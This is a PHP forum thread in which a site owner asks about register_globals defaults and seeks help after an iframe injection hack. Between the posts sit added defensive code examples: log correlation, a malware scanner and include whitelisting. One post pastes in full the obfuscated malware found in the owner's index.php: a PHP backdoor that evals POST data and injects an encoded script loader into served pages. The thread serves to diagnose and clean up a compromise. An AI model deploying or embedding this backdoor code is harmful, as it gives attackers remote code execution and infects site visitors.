Turning Register Globals OFF

Post by kendall »

Hey,

Is using this statement
;register_globals = Off
turning the register global "off", or disabling it and the default is on?

I'm using PHP < 5

Post by Christopher »


Post by kendall »

arborint wrote: That is commented out.

http://us.php.net/manual/en/ini.core.ph ... er-globals

What does it mean when it is commented out? Does it mean that it is commented out and no one can turn it on or off? Does it mean then that it defaults to on or off? Or that register_globals doesn't exist?

Post by Christopher »

If it is commented out then that line does nothing, so it will be set to the default.

Post by kendall »

arborint wrote: If it is commented out then that line does nothing, so it will be set to the default.

Which is usually "on", isn't it..... because I'm using PHP < 5?

I got hacked with the <iframe src="topworld.cn...... hack

I don't see anything in the logs that suggests how they got in.... so I'm trying to clear my name

Post by John Cartwright »

kendall wrote: Which is usually "on", isn't it..... because I'm using PHP < 5?

http://ca2.php.net/manual/en/ini.core.php#ini.register-globals wrote: As of PHP 4.2.0, this directive defaults to off.

Post by ldougherty »

<iframe injections are commonly performed via compromised FTP information. What you need to do is take the modified date of the injected file and look into the raw logs on the server to determine what happened at that time. Generally if you look through the FTP log you'll see where the file(s) have been updated.
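
The correlation described in the post above, as an added example that is not part of the original thread: it lists FTP uploads logged within two minutes of a file's modification time. It assumes xferlog-format log lines with UTC timestamps; the log lines, addresses and user name are constructed sample data.

```php
<?php
// Added example, not from the thread: list FTP uploads logged near a file's mtime.
// Assumes xferlog-format lines with UTC timestamps; the log lines are constructed.

function parseXferlog(string $line): ?array
{
    // Tokens: weekday, month, day, time, year, secs, host, bytes, file,
    // type, flag, direction, access mode, user, service, ...
    $f = preg_split('/\s+/', trim($line));
    if (count($f) < 14) {
        return null;
    }
    $when = DateTime::createFromFormat(
        '!M j H:i:s Y',
        implode(' ', array_slice($f, 1, 4)),
        new DateTimeZone('UTC')
    );
    if ($when === false) {
        return null;
    }
    return ['time' => $when->getTimestamp(), 'host' => $f[6], 'file' => $f[8],
            'direction' => $f[11], 'user' => $f[13]];
}

function uploadsNear(array $lines, int $mtime, int $window = 120): array
{
    $hits = [];
    foreach ($lines as $line) {
        $e = parseXferlog($line);
        // Direction 'i' is an incoming transfer, i.e. a file written to the server.
        if ($e !== null && $e['direction'] === 'i' && abs($e['time'] - $mtime) <= $window) {
            $hits[] = $e;
        }
    }
    return $hits;
}

// On a real server: $mtime = filemtime('/path/to/index.php');
$mtime = gmmktime(3, 12, 45, 5, 14, 2009);
$log = [
    'Thu May 14 03:12:41 2009 1 203.0.113.5 18211 /public_html/index.php b _ o r siteuser ftp 0 * c',
    'Thu May 14 03:12:45 2009 1 203.0.113.5 19874 /public_html/index.php b _ i r siteuser ftp 0 * c',
    'Thu May 14 09:30:02 2009 2 198.51.100.7 5120 /public_html/news/logo.png b _ i r siteuser ftp 0 * c',
];
foreach (uploadsNear($log, $mtime) as $e) {
    printf("%s  %s uploaded %s as %s\n", gmdate('Y-m-d H:i:s', $e['time']), $e['host'], $e['file'], $e['user']);
}
```

The modification time can be reset by anyone able to write the file, so if nothing matches, widen the window or compare against filectime() as well.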

Post by kaisellgren »

If you do not implicitly specify it as on, it should be off unless there is a third-party affecting it (like .htaccess).

That ; character in the beginning of the line is a comment marker and it makes the line a comment so it is "commented out".

I believe your problem has nothing to do with Register Globals.
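
The rules discussed in the replies above, as an added example that is not part of the original thread: a commented-out php.ini line sets nothing, the built-in default changed at PHP 4.2.0, and a .htaccess php_flag line can override both. The function name and the version numbers and .htaccess line in the sample cases are assumptions; it checks only the two files named in the thread.

```php
<?php
// Added example, not from the thread: work out which register_globals value
// applies, given php.ini text, .htaccess text and the PHP version.

function effectiveRegisterGlobals(string $phpIni, string $htaccess, string $phpVersion): array
{
    // Built-in default per the PHP manual: off as of 4.2.0, on before that.
    $enabled = version_compare($phpVersion, '4.2.0', '<');
    $source  = 'built-in default';

    foreach (preg_split('/\R/', $phpIni) as $line) {
        $line = trim($line);
        // A leading ';' turns the whole line into a comment: it sets nothing.
        if ($line === '' || $line[0] === ';') {
            continue;
        }
        if (preg_match('/^register_globals\s*=\s*"?(\w+)"?/i', $line, $m)) {
            $enabled = in_array(strtolower($m[1]), ['1', 'on', 'yes', 'true'], true);
            $source  = 'php.ini';
        }
    }

    // Under mod_php a per-directory php_flag line overrides php.ini.
    foreach (preg_split('/\R/', $htaccess) as $line) {
        if (preg_match('/^\s*php_flag\s+register_globals\s+(\w+)/i', $line, $m)) {
            $enabled = in_array(strtolower($m[1]), ['1', 'on'], true);
            $source  = '.htaccess';
        }
    }
    return ['enabled' => $enabled, 'source' => $source];
}

// Constructed inputs: the php.ini line is the one quoted in the first post.
$ini = ";register_globals = Off\n";
$cases = [
    'PHP 4.4.9, no .htaccess'   => [$ini, '', '4.4.9'],
    'PHP 4.1.0, no .htaccess'   => [$ini, '', '4.1.0'],
    'PHP 4.4.9, .htaccess flag' => [$ini, "php_flag register_globals on\n", '4.4.9'],
];
foreach ($cases as $label => [$i, $h, $v]) {
    echo $label, ': ', json_encode(effectiveRegisterGlobals($i, $h, $v)), "\n";
}
```

On a live server, ini_get('register_globals') or phpinfo() reports the value actually in effect.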

Post by kendall »

Got that from my server logs.... Can anyone explain what he is trying to do here?

Post by kaisellgren »

kendall wrote: Got that from my server logs.... Can anyone explain what he is trying to do here?

Your index.php in news page may be vulnerable to attacks due to lack of proper input filtering.

Post by kendall »

Code:

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_
lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGF
JOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCB
sYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe
3ZhciBiQzREPSdfNzZhcl8yMGFfM2RfMjJTY3JpcHRfNDVuZ2lu
ZV8yMl8yY2JfM2RfMjJfNTZlcnNpb25fMjhfMjkrXzIyXzJjal8zZF8
yMl8yMl8yY3VfM2RfNmVhdmlfNjdhXzc0b183Ml8yZXVzZV83Mk
FnZW50XzNiaWZfMjgoXzc1XzJlaW5kXzY1eE9mXzI4XzIyV2luX
zIyKV8zZTApXzI2XzI2KHVfMmVpbmRleE9mXzI4XzIyXzRlVF8y
MF8zNl8yMilfM2NfMzBfMjlfMjZfMjYoZG9jdW1lbnRfMmVjb29fNm
JfNjlfNjVfMmVpbmRlXzc4T2ZfMjhfMjJtaWVrXzNkMV8yMilfM2Mw
KV8yNl8yNih0eV83MGVvZl8yOF83YV83MnZ6Xzc0cylfMjFfM2R
0eXBlb2YoXzIyQV8yMilfMjkpXzdiXzdhcnZ6Xzc0c18zZF8yMkFf
MjJfM2Jldl82MWxfMjhfMjJfNjlmKHdfNjluZF82ZndfMmVfMjJfMmJ
hXzJiXzIyKWpfM2RqXzJiXzIyK182MStfMjJfNGRhal82ZnJfMjJfM
mJiK2ErXzIyXzRkaW5vXzcyXzIyXzJiYitfNjErXzIyXzQyXzc1aV8
2Y2RfMjIrYl8yYl8yMmpfM2JfMjJfMjlfM2JkXzZmY3VfNmRlbnRfM
mV3XzcyXzY5dGUoXzIyXzNjc2NyaXB0XzIwc3JfNjNfM2RfMmZf
MmZndW1ibGFyXzJlY25fMmZyc3NfMmZfM2ZfNjlfNjRfM2RfMjIra
itfMjJfM2VfM2NfNWNfMmZzY3JpcHRfM2VfMjIpXzNiXzdkJzt2YX
IgRnVKeD1iQzRELnJlcGxhY2UoL18vZywnJScpO3ZhciB4RnRJS
j11bmVzY2FwZShGdUp4KTtldmFsKHhGdElKKX0pKCk7CiAtLT48
L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
This is what is being left on my index.php pages.... both in PHP and JavaScript.... I am finding an image.php in my images files.
Last edited by Benjamin on Sun May 17, 2009 2:21 am, edited 2 times in total.
Reason: Changed code type from text to php, Added line feeds to avoid horizontal scrolling.
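
A cleanup aid for the situation in the post above, as an added example that is not part of the original thread: it walks a web root and reports files carrying the markers visible in the pasted code (eval of request data, a long base64 literal, tmp_-named output and error handlers) and PHP files sitting in an image directory. The patterns are heuristics chosen for this example and the directory names are assumptions.

```php
<?php
// Added example, not from the thread: flag files that carry the markers visible in
// the injected code above. The patterns are heuristics chosen for this example.

const INDICATORS = [
    'eval() of request data' => '/\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b/i',
    'long base64 literal'    => '/base64_decode\s*\(\s*[\'"][A-Za-z0-9+\/=\s]{200,}[\'"]/',
    'tmp_ output handler'    => '/ob_start\s*\(\s*[\'"]tmp_\w+[\'"]/i',
    'tmp_ error handler'     => '/set_error_handler\s*\(\s*[\'"]tmp_\w+[\'"]/i',
];

function scanSource(string $code): array
{
    $found = [];
    foreach (INDICATORS as $label => $regex) {
        if (preg_match($regex, $code) === 1) {
            $found[] = $label;
        }
    }
    return $found;
}

function scanTree(string $root): array
{
    $report = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        $path = str_replace('\\', '/', $file->getPathname());
        if (!$file->isFile() || !preg_match('/\.(php\d?|phtml|inc|html?)$/i', $path)) {
            continue;
        }
        $hits = scanSource((string) file_get_contents($path));
        // A script inside an image directory is suspicious whatever it contains.
        if (preg_match('#/(images?|img)/[^/]*\.(php\d?|phtml)$#i', $path)) {
            $hits[] = 'PHP file in image directory';
        }
        if ($hits !== []) {
            $report[$path] = $hits;
        }
    }
    return $report;
}

// Usage: php scan.php /path/to/webroot   (defaults to the current directory)
foreach (scanTree($argv[1] ?? '.') as $path => $hits) {
    echo $path, ': ', implode(', ', $hits), "\n";
}
```

A clean result only means these particular markers are absent; restoring from a known-good copy remains the reliable way to remove injected code.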

Post by John Cartwright »

As described before, you are not filtering your input variables correctly, and in not doing so, have allowed the execution of remote code on your server (which in turn manipulated your files). The first step would be to immediately take your site offline until this has been patched, otherwise there is no way to tell how far you've been compromised. The second step would be to ensure you are only including files within your filesystem, and preferably whitelisted.
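
The whitelisting advice in the post above, as an added example that is not part of the original thread: the request value is only ever used as a lookup key, and the resolved file must sit inside the pages directory. The page keys, file names, demo directory and the idea of a page parameter are hypothetical; the code is written for current PHP (7.1 or later).

```php
<?php
// Added example, not from the thread: map a request value to an include file
// through a whitelist. Page keys, file names and the demo directory are hypothetical.

const PAGES = ['home' => 'home.php', 'news' => 'news.php', 'contact' => 'contact.php'];

function resolvePage($requested, string $baseDir): ?string
{
    // Accept only exact, known keys; the request value never becomes part of a path.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Second check: the file must exist and resolve to a location inside $baseDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Demo directory holding one whitelisted page.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo';
if (!is_dir($base)) {
    mkdir($base);
}
file_put_contents($base . DIRECTORY_SEPARATOR . 'news.php', "<?php echo 'news page';\n");

// Constructed request values: one valid key and three that must be refused.
$inputs = ['news', 'http://example.invalid/x.txt', '../../etc/passwd', ['news']];
foreach ($inputs as $input) {
    $file = resolvePage($input, $base);
    echo json_encode($input), ' => ', $file ?? 'refused', "\n";
    // In index.php: if ($file !== null) { include $file; } else { send a 404. }
}
```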